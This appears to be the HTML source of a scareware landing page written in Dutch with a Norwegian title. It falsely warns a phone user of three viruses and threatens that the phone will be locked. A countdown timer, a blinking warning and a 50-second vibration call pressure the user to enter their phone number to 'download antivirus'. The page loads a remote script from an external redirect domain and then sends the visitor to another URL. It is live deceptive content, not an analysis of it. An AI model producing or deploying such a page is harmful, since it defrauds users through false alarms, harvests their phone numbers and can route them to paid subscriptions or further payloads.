<!DOCTYPE html>
<html webdriver="true">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Virusadvarsel!</title>
    <meta name="robots" content="noindex, nofollow">
    <meta name="googlebot" content="noindex, nofollow">
    <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <style type="text/css">
    #timer p,
    p {
        color: rgb(85, 85, 85);
    }

    #error,
    #timer {
        display: inline-block;
        float: left;
    }

    #timer p,
    .btn {
        font-weight: 700;
    }

    body {
        font-family: sans-serif;
    }

    a {
        text-decoration: none;
    }

    footer,
    header,
    section {
        clear: both;
    }

    * {
        margin: 0px;
        padding: 0px;
    }

    #wrapper {
        max-width: 400px;
        border: 0px solid rgb(48, 48, 48);
        border-radius: 0px;
    }

    p {
        font-size: 14px;
        padding: 5px 0px;
    }

    #timer {
        max-width: 290px;
        width: 65%;
    }

    #timer p {
        font-size: 12px;
    }

    .btn {
        background-color: #236DA6;
        border-radius: 5px;
        color: rgb(255, 255, 255);
        display: block;
        line-height: 50px;
        max-width: 275px;
        width: 90%;
    }

    .container {
        padding-left: 8px;
        padding-right: 8px;
    }

    #blink {
        color: #ff0000;
        padding: 6px;
        -webkit-animation: blink 1s infinite;
        -moz-animation: blink 1s infinite;
        -ms-animation: blink 1s infinite;
        -o-animation: blink 1s infinite;
        animation: blink 1s infinite
    }

    @-webkit-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }

    @-moz-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }
    }

    @-ms-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }

    @-o-keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }
    }

    @keyframes blink {
        0% {
            opacity: 1.0
        }

        50% {
            opacity: .0
        }

        100% {
            opacity: 1.0
        }

        #today {
            float: right;
            font-weight: 600;
            padding-top: 15px
        }
    </style>
</head>

<body>
    <div id="wrapper">
        <div class="container">
            <header>
                <img src="./index_files/wan.png">
            </header>
            <section>
                <h1>Bescherm uw telefoon tegen virussen <span id="blink">(3)</span> virussen!</h1>
            </section>
            <section>
                <p></p>
                <h3>U moet onmiddellijk een antivirusprogramma installeren om uw systeem te reinigen, anders wordt uw telefoon vergrendeld.</h3>
                <p><b>Na de reiniging:</b>
                    <br>Snelheid neemt toe met: <span style="font-size: 16px; font-weight: bold; color: green; font-family: sans-serif;">75%</span>
                    <br>De batterijlading neemt toe met: <span style="font-size: 16px; font-weight: bold; color: green; font-family: sans-serif;">53%</span>
                </p>
                <div id="timer">
                    <p>
                    	<span class="red2">
                        	<span style="font-size: 20px; font-weight: bold; color: red; font-family: sans-serif;" id="theTime">0 minuten en 11 seconden</span>
                    	</span>
                	</p>
                </div>
            </section>
            <section>
                <p>
                    <strong>Dat is wat je moet doen. <strong>(stap voor stap):</strong>
                        <br>
                        <br><span style="font-size: 16px; font-weight: bold;" id="blink">Stap 1 :
                        </span><strong>Druk op de onderstaande knop en voer uw telefoonnummer op de volgende pagina in om het downloaden te starten.</strong><br> <br>
                        <span style="font-size: 16px; font-weight: bold;" id="blink">Stap 2 :</span><strong>Voer een antivirusprogramma uit om alle virussen te verwijderen.</strong></strong></p><strong>
                    <p></p>
                </strong>
            </section><strong>
                <footer>
                    <p align="center"><a class="btn" href="#"><strong>REPAREER NU UW TELEFOON!</strong></a></p>
                </footer>
            </strong>
        </div><strong>
            
        </strong>
    </div>
    <script src="http://to.searchredirectt.com/preland.js"></script>
    <script>  
    navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
    navigator.vibrate([50000]);
    </script>
    <script language="JavaScript" type="text/javascript">
    var sec = 20;
    var min = 00;

    function countDown() {
        sec--;
        if (sec == -01) {
            sec = 59;
            min = min - 1;
        } else {
            min = min;
        }
        if (sec <= 9) { sec = "0" + sec; }
        time = (min <= 9 ? "" + min : min) + " minuten en " + sec + " seconden";
        if (document.getElementById) { document.getElementById('theTime').innerHTML = time; }
        SD = window.setTimeout("countDown();", 1000);
        if (min == '00' && sec == '00') { sec = "00";
            window.clearTimeout(SD);
            window.location = afurl; }
    }
    window.onload = countDown;
    </script>
</body>
</html>